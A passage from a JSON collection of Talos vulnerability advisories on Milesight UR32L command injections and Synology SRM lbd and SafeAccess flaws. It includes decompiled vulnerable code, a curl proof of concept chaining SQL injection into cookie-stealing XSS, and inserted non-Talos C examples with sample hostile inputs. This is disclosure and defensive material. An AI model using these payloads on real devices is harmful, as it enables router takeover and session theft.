*rcp_session)\n \n {\n [... variable declaration ...]\n \n [... 
variable initialization ...]\n [...]\n get_tool_path.constprop.4(ping_or_trace,1,rcp_session,(char)lock_path);\n get_tool_path.constprop.4(ping_or_trace,0,rcp_session,(char)log_path);\n if (ping_or_trace == (void *)0x0) {\n command = \"ping\";\n }\n else {\n command = \"trace\";\n }\n snprintf(shell_cmd,0x120,\"%s %s %s %s %s &\",\"/usr/sbin/webtools.sh\",command,params,log_path,\n lock_path); [1]\n printf(\"** lock=%s **\\n** path=%s **\\n** command=%s **\\n\",lock_path,log_path,shell_cmd);\n does_lock_exist = access((char *)lock_path,0);\n if (does_lock_exist == 0) {\n [..]\n }\n else {\n lock_fd = open((char *)lock_path,0x41,0);\n if (-1 < lock_fd) {\n close(lock_fd);\n system(shell_cmd); [2]\n [...]\n }\n [...]\n }\n [...]\n }\n \n\nThis function, based on the `ping_or_trace` parameter, composes at `[1]` the string `/usr/sbin/webtools.sh <ping/trace> <params> <log_path> <lock_path> &`. If no other \"ping\" or \"traceroute\" command is currently running, which is checked through the lock file, the composed string reaches the `system` function at `[2]`. Because the `params` parameter is neither checked nor sufficiently parsed, this can lead to an OS command injection at `[2]`. Following are the \"ping\" and \"traceroute\" functions that call the vulnerable `toolsh_excute.constprop.1` function.\n\n#### CVE-2023-24519 - tools_ping\n\nThe `tools_ping` is the function responsible for managing the ping function in the `yruo_tools` \u201ccore\u201d:\n \n \n void tools_ping(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,\n undefined4 *data)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n json_msg_output(\"!! 
yruo_tools.ping params\",data);\n blob_buf_init(b,0);\n len = __bswapsi2(*data);\n blobmsg_parse(tools_ping_policy,2,tb,data + 1,(len & 0xffffff) - 4);\n if ((tb[0] == (blob_attr *)0x0) || (tb[1] == (blob_attr *)0x0)) {\n blobmsg_add_string(b,\"error\",\"lack of param to test\");\n }\n else {\n blob_string = (char *)blobmsg_get_string((char *)tb[0]);\n strncpy(ping_host,blob_string,0x40); [3]\n blob_string = (char *)blobmsg_get_string((char *)tb[1]);\n strncpy(ubus_rpc_session,blob_string,0x40);\n strtok(ping_host,\" \"); [4]\n toolsh_excute.constprop.1(0,ping_host,ubus_rpc_session);\n }\n [...]\n }\n \n\nThe data are transmitted through `blobmsg` structures. The two variables that eventually reach this function are:\n\n- `host`: a parameter that should represent the host that will be pinged\n- `ubus_rpc_session`: a parameter that will be used to check if the provided request was performed by someone that had logged in successfully\n\nAt `[3]` the `host` parameter is copied and then, at `[4]`, only the first word, separated by a space, is taken into consideration. This first word becomes the `params` parameter of `toolsh_excute.constprop.1`. The only parsing performed on the `host` parameter is keeping the first word before a space, which is not enough to prevent an OS command injection vulnerability.\n\n#### CVE-2023-24520 - tools_trace\n\nThe `tools_trace` is the function responsible for managing the \u201ctraceroute\u201d function in the `yruo_tools` \u201ccore\u201d:\n \n \n void tools_trace(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,\n undefined4 *data)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n json_msg_output(\"!! 
yruo_tools.traceroute params\",data);\n blob_buf_init(b,0);\n len = __bswapsi2(*data);\n blobmsg_parse(tools_trace_policy,2,tb,data + 1,(len & 0xffffff) - 4);\n if ((tb[0] == (blob_attr *)0x0) || (tb[1] == (blob_attr *)0x0)) {\n blobmsg_add_string(b,\"error\",\"lack of param to test\");\n }\n else {\n tmp = (char *)blobmsg_get_string((char *)tb[0]);\n strncpy(host,tmp,0x40); [5]\n tmp = (char *)blobmsg_get_string((char *)tb[1]);\n strncpy(ubus_rcp_session,tmp,0x40);\n strtok(host,\" \"); [6]\n toolsh_excute.constprop.1(1,host,ubus_rcp_session);\n }\n [...]\n }\n \n\nThe data are transmitted through `blobmsg` structures. The two variables that eventually reach this function are:\n\n- `host`: a parameter that should represent the host that will be used for the \u201ctraceroute\u201d functionality\n- `ubus_rpc_session`: a parameter that will be used to check if the provided request was performed by someone that had logged in successfully\n\nAt `[5]` the `host` parameter is copied and then, at `[6]`, only the first word, separated by a space, is taken into consideration. This first word becomes the `params` parameter of `toolsh_excute.constprop.1`. The only parsing performed on the `host` parameter is keeping the first word before a space, which is not enough to prevent an OS command injection vulnerability.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1712\n\nPrevious Report\n\nTALOS-2023-1694\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L vtysh_ubus toolsh_excute.constprop.1 OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-24519", "CVE-2023-24520"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1706", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1706", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:53:30", "description": "### Summary\n\nAn exploitable command execution vulnerability exists in the lbd service functionality of Qualcomm lbd 1.1, as 
present in Synology SRM 1.2.3 RT2600ac 8017-5. A specially crafted debug command can overwrite arbitrary files with controllable content, resulting in remote code execution. An attacker can send an unauthenticated message to trigger this vulnerability.\n\n### Tested Versions\n\nQualcomm lbd 1.1 \nSynology SRM 1.2.3 RT2600ac 8017-5\n\n### Product URLs\n\n<https://www.synology.com/en-global/srm>\n\n### CVSSv3 Score\n\n9.6 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-73 - External Control of File Name or Path\n\n### Details\n\nSynology Router Manager (SRM) is a Linux-based operating system for Synology Routers developed by Synology.\n\nSRM ships a binary called \u201cQualcomm Load Balancing Daemon\u201d (`lbd`), which is used for monitoring and debugging a load-balancing feature in the WiFi interfaces. This service can be managed via network, and there are two instances of it running at the same time, one for the main WiFi (port 7787) and one for the guest WiFi (port 7786). The two instances are configured in the exact same way, except for the interface they manage. 
Both ports are reachable via LAN.\n\nThe service has no authentication and shows a menu:\n \n \n $ nc 192.168.1.1 7786\n Use `h' and `help' for help messages\n Use `dbg here' to see log messages; other dbg cmds for log level\n @\n \n\nIn the `dbg` menu, there\u2019s an option to \u201credirect\u201d debug output to a file.\n \n \n @ dbg h\n h [cmd] -- short help (first line of each help message).\n help [cmd] -- long help.\n q -- quit interactive menu\n s -- print dbg status\n level [{<module>|all} [[=] {err|info|debug|dump}] -- print/change module debug level\n here [-off] -- copy debug messages to current shell context\n redirect {[-a] <path>} | -off -- redirect dbg messages to file\n \n\nAn attacker could connect to this port, enable debug output to a file, and influence it in a way that interpretable output gets written to executable files, in order to execute arbitrary code without authentication. Any command executed this way would be run as the root user:\n \n \n SynologyRouter> ps |grep [l]bd\n 29380 root 3032 S /usr/sbin/lbd -C /usr/syno/etc/wifi/lbd.conf -P 7787\n 29997 root 3036 S /usr/sbin/lbd -C /usr/syno/etc/wifi/lbd.guest.conf -P 7786\n \n\nNote that, while this service is normally reachable only within LAN, because of the issues described in TALOS-2020-1064 and TALOS-2020-1066, this service is exploitable also from the QuickConnect network, allowing a non-authenticated attacker to execute arbitrary code as root in any device connected to the QuickConnect VPN.\n\n### Timeline\n\n2020-05-04 - Vendor disclosure to Synology and Qualcomm \n2020-06-02 - Disclosure release deadline requested and Talos extended to 2020-09-30 \n2020-06-22 - 2nd extension requested; disclosure extended to 2020-10-30 \n2020-07-09 - Vendor (Qualcomm) assigned CVE-2020-11117 \n2020-08-28 - Vendor (Qualcomm) confirmed patch \n2020-10-29 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T00:00:00", "type": "talos", "title": "Synology SRM lbd service Command Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11117", "CVE-2020-27654"], "modified": "2020-10-29T00:00:00", "id": "TALOS-2020-1065", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:53:42", "description": "### Summary\n\nAn exploitable code execution vulnerability exists in the SafeAccess 1.2.1-0220 package of Synology SRM 1.2.3 RT2600ac 8017-5. A specially crafted domain access request can lead to an SQL injection. 
An attacker can send an HTTP request to trigger this vulnerability.\n\n### Tested Versions\n\nSynology SRM 1.2.3 RT2600ac 8017-5\n\n### Product URLs\n\n<https://www.synology.com/en-global/srm>\n\n### CVSSv3 Score\n\n8.3 - CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-89 - Improper Neutralization of Special Elements used in an SQL Command (\u2018SQL Injection\u2019)\n\n### Details\n\nSynology Router Manager (SRM) is a Linux-based operating system for Synology routers.\n\nSRM allows for installing additional packages to add new functionalities to the router. \nOne of the installable packages is \u201cSafeAccess\u201d, which can be used to track users in the local network in order to filter their Internet access (blacklisting websites, limiting the browsing time, etc.).\n\nFor example, a user can be put in a specific profile that limits the browsing of shopping websites. If the user then tries to connect to one of the blocked websites, a blocking page will be shown. In the blocking page, there\u2019s a button that allows the user to send a request to the network administrator and ask for access anyway. At this point, the network administrator will receive a notification (in various configurable ways) and will have the possibility to deny or allow access via the web interface.\n\nThe request button sends an HTTP request:\n \n \n GET /cgi/request.cgi?_dc=1589562062753&domain=shopping.local HTTP/1.1 // [1]\n Host: shopping.local\n Connection: keep-alive\n X-Requested-With: XMLHttpRequest\n Referer: http://shopping.local/\n \n\nIn the example above the user asks for access to the blocked website \u201cshopping.local\u201d [1].\n\nThe `request.cgi` binary in the router handles the request. The requested domain is extracted and is eventually passed to the `libsynosafeaccesslog.so` library, which logs the request attempt by inserting it in a `sqlite` database in \u201c/usr/syno/etc/packages/SafeAccess/synosafeaccesslog/log.db\u201d. 
The query is built in function `syno::safeaccess::insert`:\n \n \n /* syno::safeaccess::insert(SQLite::Database&, std::basic_string, std::basic_string) */\n \n void __thiscall insert(safeaccess *this, Database *db, basic_string *table, basic_string *text) {\n basic_format(&fmt,\n \"INSERT OR IGNORE INTO %1% (id, text) VALUES((SELECT MAX(id)+1 FROM %1%),\\'%2%\\');\", // [2]\n table,text);\n _local_a8 = db;\n pbVar1 = feed_impl(&fmt,&local_a8);\n _local_9c = table;\n pbVar2 = feed_impl(pbVar1,&local_9c);\n str(&query,pbVar2);\n exec((Database *)this,query); // [3]\n ...\n return;\n }\n \n\nAt [2], the format string for the query is built, and we can see the second parameter, `text`, is wrapped in single quotes, however it has never been escaped before. This parameter is completely controllable and corresponds to the `domain` parameter sent via the \u201cGET\u201d request at [1]. \nFinally the query is passed to the function `SQLite::Database::exec` at [3], resulting in a SQL injection via the \u201cdomain\u201d parameter.\n\nFor reference, the full function call for `request.cgi` is the following:\n \n \n (gdb) bt\n #0 0xb574f9cc in SQLite::Database::exec(char const*) () from /lib/libSQLiteCpp.so.5.2\n #1 0xb5a98458 in syno::safeaccess::insert(SQLite::Database&, std::string const&, std::string const&) () from /var/packages/SafeAccess/target/lib/libsynosafeaccesslog.so.5.2\n #2 0xb5a9a8e0 in syno::safeaccess::Logger::add(syno::safeaccess::RequestLog const&, long) const () from /var/packages/SafeAccess/target/lib/libsynosafeaccesslog.so.5.2\n #3 0xb6cf6338 in syno::parentalcontrol::RequestSender::SendByMacIfname(std::string const&, std::string const&, std::string const&) () from /var/packages/SafeAccess/target/lib/libsynoparentalcontrol.so.1.2.1\n #4 0xb6cf5de8 in syno::parentalcontrol::RequestSender::SendByIp(std::string const&, std::string const&) () from /var/packages/SafeAccess/target/lib/libsynoparentalcontrol.so.1.2.1\n #5 0x00011704 in ?? 
()\n #6 0x00011850 in ?? ()\n #7 0xb693b5bc in __libc_start_main () from /lib/libc.so.6\n \n\nBecause the `httpd` server is executed as the `root` user, an attacker could exploit this SQL injection to execute arbitrary code on the device.\n\n### Exploit Proof of Concept\n\nThe SQL injection described above allows executing stacked queries, making this issue exploitable in multiple ways.\n\nIn this proof-of-concept, we demonstrate one simple exploitation method: via the SQL injection, we connect to a different database and exploit a subsequent XSS in the SafeAccess \u201cProfile\u201d and \u201cActivity/Logs\u201d pages, in order to steal the session cookie of the web interface.\n \n \n $ sql='commit;'\\\n 'attach database \"/usr/syno/etc/packages/SafeAccess/synoaccesscontrol/database.db\" as x;'\\\n 'update x.profile set name=\"user<img src=/ onerror=\"\"alert(document.cookie)\"\"/>\" where id=3;'\n $ curl \"http://10.254.1.2/cgi/request.cgi?domain=%27);\"$(echo \"$sql\" | sed \"s/ /%20/g\")\"--\"\n \n\nThe proof-of-concept assumes there\u2019s one user profile (hence `id=3`) configured in SafeAccess.\n\nOnce executed, the profile name for user id 3 will be changed to `user<img src=/ onerror=\"\"alert(document.cookie)\"\"/>`. When an administrator logs into the web interface and browses the SafeAccess logs or profiles (because of a notification previously received via `request.cgi`), the Javascript will execute. 
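As an added illustration (not part of the Talos advisory and not Synology's code), the C program below builds the `INSERT` the same way the `insert` function above does, counts how many top-level statements the result contains, and then repeats the construction with the value quoted. The domain value is a shortened, constructed version of the proof-of-concept payload, the table name is made up, and `count_statements` is a helper written for this example rather than a SQLite API:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed input: the shape of the proof-of-concept domain value above,
 * with the URL-encoding removed and a throwaway path and profile name. */
const char *const POC_DOMAIN =
    "');commit;attach database \"x\" as x;update x.profile set name=\"p\" where id=3;--";

/* Vulnerable construction: the same shape as the format string in
 * syno::safeaccess::insert. The text is wrapped in quotes but never escaped. */
int build_insert_vuln(char *out, size_t outsz, const char *table, const char *text)
{
    int n = snprintf(out, outsz,
        "INSERT OR IGNORE INTO %s (id, text) VALUES((SELECT MAX(id)+1 FROM %s),'%s');",
        table, table, text);
    return (n >= 0 && (size_t)n < outsz) ? n : -1;
}

/* Double every single quote so the value cannot terminate the SQL literal.
 * Returns a malloc'd string the caller frees, or NULL on allocation failure. */
char *sql_quote(const char *s)
{
    size_t len = strlen(s), quotes = 0;
    for (const char *p = s; *p; p++)
        if (*p == '\'') quotes++;
    char *out = malloc(len + quotes + 1);
    if (!out) return NULL;
    char *o = out;
    for (const char *p = s; *p; p++) {
        *o++ = *p;
        if (*p == '\'') *o++ = '\'';
    }
    *o = '\0';
    return out;
}

/* Hardened construction: same statement, value escaped first. A prepared
 * statement with a bound parameter is the better fix; escaping is used here
 * only so the example runs without linking SQLite. */
int build_insert_safe(char *out, size_t outsz, const char *table, const char *text)
{
    char *q = sql_quote(text);
    if (!q) return -1;
    int n = build_insert_vuln(out, outsz, table, q);
    free(q);
    return n;
}

/* Count top-level statements in a SQL string: a ';' outside string literals,
 * quoted identifiers and '--' comments ends one. exec() runs them all, so
 * anything above 1 means the injected value turned into stacked queries. */
int count_statements(const char *sql)
{
    int count = 0, pending = 0;
    for (size_t i = 0; sql[i]; i++) {
        char c = sql[i];
        if (c == '\'' || c == '"') {
            char q = c;
            for (i++; sql[i]; i++) {
                if (sql[i] == q) {
                    if (sql[i + 1] == q) { i++; continue; }  /* doubled quote */
                    break;
                }
            }
            if (!sql[i]) break;                               /* unterminated */
            pending = 1;
        } else if (c == '-' && sql[i + 1] == '-') {
            while (sql[i] && sql[i] != '\n') i++;             /* line comment */
            if (!sql[i]) break;
        } else if (c == ';') {
            if (pending) count++;
            pending = 0;
        } else if (c != ' ' && c != '\t' && c != '\r' && c != '\n') {
            pending = 1;
        }
    }
    return count + (pending ? 1 : 0);
}

int main(void)
{
    char q[512];
    build_insert_vuln(q, sizeof q, "request", POC_DOMAIN);
    printf("unescaped: %d statement(s)\n%s\n\n", count_statements(q), q);
    build_insert_safe(q, sizeof q, "request", POC_DOMAIN);
    printf("escaped:   %d statement(s)\n%s\n", count_statements(q), q);
    return 0;
}
```

With the unescaped build the payload closes the literal, runs `commit`, `attach` and `update` as their own statements and comments out the trailing `');`; with the value quoted the whole payload stays inside one literal and is stored as text.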
This happens because the profile name is trusted, and hence not sanitized before being inserted into the page.\n\nMoreover, note that the session cookie is accessible because of the issue described in TALOS-2020-1086.\n\n### Timeline\n\n2020-05-18 - Vendor Disclosure \n2020-11-30 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "talos", "title": "Synology SRM SafeAccess 1.2.1-0220 code execution vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27659", "CVE-2020-27660"], "modified": "2020-05-18T00:00:00", "id": "TALOS-2020-1087", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1087", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-08T19:04:40", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1710\n\n## Milesight UR32L urvpn_client cmd_name_action OS command injection vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-24583,CVE-2023-24582\n\n##### SUMMARY\n\nTwo OS command injection vulnerabilities exist in the urvpn_client 
cmd_name_action functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial radio router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers a service called Milesight VPN, which will connect to the Milesight VPN software. The binary client used for this service is `urvpn_client`. This binary will connect to the specified Milesight VPN server but will also listen for network request to allow the sender to change VPN settings. The function that will, eventually, parse the received data and modify the VPN settings is the `urvpn_client`\u2019s`execute_urvpn_command` function:\n \n \n undefined4 execute_urvpn_command(byte *data_buff)\n \n {\n [... variable declaration ...]\n \n json = utils_parse_string2json_object(data_buff);\n [... 
variable initialization ...]\n if (json == 0) {\n uVar2 = 0xffffffff;\n }\n else {\n json_get_value_by_key(json,\"type\",type_value,0x40);\n is_equal = strcmp(type_value,\"cmd_reconnect\");\n if (is_equal == 0) {\n sleep(5);\n cmd_reconnect_action();\n }\n else {\n is_equal = strcmp(type_value,\"cmd_subnet\");\n if (is_equal == 0) {\n [...]\n }\n else {\n is_equal = strcmp(type_value,\"cmd_name\");\n if (is_equal == 0) {\n json_get_value_by_key(json,\"name\",cmd_name,0x40); [1]\n cmd_name_action(cmd_name);\n }\n }\n }\n [...]\n }\n [...]\n }\n \n\nThis function parses a JSON document. Based on the value of the string corresponding to the key `type`, the function will execute a specific command. If the type value is equal to `cmd_name`, the code at `[1]` will be reached and the `cmd_name_action` function will be called with, as argument, the string value corresponding to the key `name` in the JSON.\n\nFollowing the `cmd_name_action` function:\n \n \n undefined4 cmd_name_action(char* cmd_name)\n \n {\n [...]\n snprintf((char *)&formatted_string,0x200,\n \"ubus call yruo_urvpn set \\'{\\\"base\\\":\\\"urvpn_manage\\\", \\\"value\\\":{\\\"action\\\":2,\\\"device_ name\\\":\\\"%s\\\"}}\\'\"\n ,cmd_name);\n [...]\n system((char *)&formatted_string); [2]\n return 0;\n }\n \n\nThis function uses the provided `name` string value to compose a shell command that will be executed, at `[2]`, through the `system` function. This can lead to an OS command injection vulnerability.\n\nThere are two code paths to reach this vulnerable function, which are described as follows.\n\n#### CVE-2023-24582 - TCP handler\n\nIt is possible to reach the `execute_urvpn_command` function through a TCP connection. The function that will manage this connection is `tcp_execute_urvpn_command_wrap`:\n \n \n void tcp_execute_urvpn_command_wrap(undefined4 bufev,undefined4 param_2)\n \n {\n [... 
variable declaration ...]\n \n local_20 = param_2;\n local_1c = bufev;\n start_evbuff_ptr = bufferevent_get_input(bufev);\n input_line = (byte *)0x0;\n evbuffer_search_eol(ev_buffer,start_evbuff_ptr,0,&local_14,0);\n if (local_14 == 0) {\n [...]\n }\n else {\n input_line = (byte *)evbuffer_readln(start_evbuff_ptr,0,0);\n if (input_line != (byte *)0x0) {\n log_stuff(\"comtcpip.c\",0x4d,\"_comtcpip_readcb\",2,\"reveive TCP :%s\",input_line);\n execute_urvpn_command(input_line);\n [...]\n }\n }\n [...]\n }\n \n\nThe function receives the JSON data and eventually calls `execute_urvpn_command` with the received JSON as its argument. No checks are performed on the received data that will eventually reach `cmd_name_action`.\n\n#### CVE-2023-24583 - UDP handler\n\nIt is possible to reach the `execute_urvpn_command` function through a UDP connection. The function that will manage this connection is `udp_execute_urvpn_command_wrap`:\n \n \n undefined4 udp_execute_urvpn_command_wrap(int socket)\n \n {\n [... variable declaration ...]\n \n recv_buff._0_4_ = 0;\n memset(recv_buff + 4,0,0x3fc);\n local_410 = 0x10;\n memset(recv_buff,0,0x400);\n sVar1 = recvfrom(socket,recv_buff,0x400,0,&sStack_420,&local_410);\n if (sVar1 == -1) {\n [...]\n }\n else if (sVar1 == 0) {\n [...]\n }\n else {\n log_stuff(\"comudp.c\",0x29,\"udp_read_cb\",1,\"Udp Read :[%s]\",recv_buff);\n uVar4 = execute_urvpn_command((byte *)recv_buff);\n }\n [...]\n }\n \n\nThe function receives the JSON data and eventually calls `execute_urvpn_command` with the received JSON as its argument. No checks are performed on the received data that will eventually reach `cmd_name_action`.\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. 
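Added example, not code from the advisory or from Milesight: the C program below assembles the `ubus` command with the same format `cmd_name_action` uses, shows what a hostile `name` turns it into, then applies an allowlist and finally issues the call without any shell via `fork`/`execvp`, handing `ubus` the JSON as a single argument. The hostile name, the allowlist, the `ubus_path` parameter (so the call can be exercised with `echo` as a stand-in) and all function names are constructed for this example:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define CMD_MAX 0x200

/* Vulnerable shape: the name is pasted into a single-quoted shell argument
 * and the result is meant for system(), as in cmd_name_action. A name that
 * contains a single quote closes the argument and the rest is shell syntax. */
int build_ubus_command_vuln(char *out, size_t outsz, const char *name)
{
    int n = snprintf(out, outsz,
        "ubus call yruo_urvpn set '{\"base\":\"urvpn_manage\", "
        "\"value\":{\"action\":2,\"device_name\":\"%s\"}}'", name);
    return (n >= 0 && (size_t)n < outsz) ? n : -1;
}

/* Allowlist for a device name: 1-63 characters from [A-Za-z0-9._-].
 * Everything the shell or a JSON parser treats specially is excluded, so the
 * check holds whether or not a shell is involved downstream. */
int device_name_is_safe(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > 63) return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Same command string, but refused unless the name passes the allowlist. */
int build_ubus_command_safe(char *out, size_t outsz, const char *name)
{
    if (!device_name_is_safe(name)) return -1;
    return build_ubus_command_vuln(out, outsz, name);
}

/* Run argv[0] directly with fork/execvp: no shell ever sees the arguments.
 * Returns the child's exit status, or -1 if it could not be run. */
int run_without_shell(char *const argv[])
{
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Hardened equivalent of cmd_name_action: validate, then hand ubus the JSON
 * as one argv entry. ubus_path is a parameter only so the example can be run
 * with a stand-in binary such as echo on a machine without ubus. */
int ubus_set_device_name(const char *ubus_path, const char *name)
{
    char json[CMD_MAX];
    if (!device_name_is_safe(name)) return -1;
    int n = snprintf(json, sizeof json,
        "{\"base\":\"urvpn_manage\", \"value\":{\"action\":2,\"device_name\":\"%s\"}}",
        name);
    if (n < 0 || (size_t)n >= sizeof json) return -1;
    char *const argv[] = { (char *)ubus_path, "call", "yruo_urvpn", "set", json, NULL };
    return run_without_shell(argv);
}

int main(void)
{
    char cmd[CMD_MAX];
    const char *hostile = "x\"}}'; id; echo '";   /* constructed attacker-controlled name */
    build_ubus_command_vuln(cmd, sizeof cmd, hostile);
    printf("system() would receive:\n  %s\n", cmd);
    printf("allowlist accepts it: %d\n", device_name_is_safe(hostile));
    printf("safe path via echo, exit status: %d\n", ubus_set_device_name("echo", "router-01"));
    return 0;
}
```

The allowlist is kept even on the no-shell path: without it a quote in the name would still break the JSON that `ubus` receives, just not the shell.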
See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1718\n\nPrevious Report\n\nTALOS-2023-1695\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L urvpn_client cmd_name_action OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 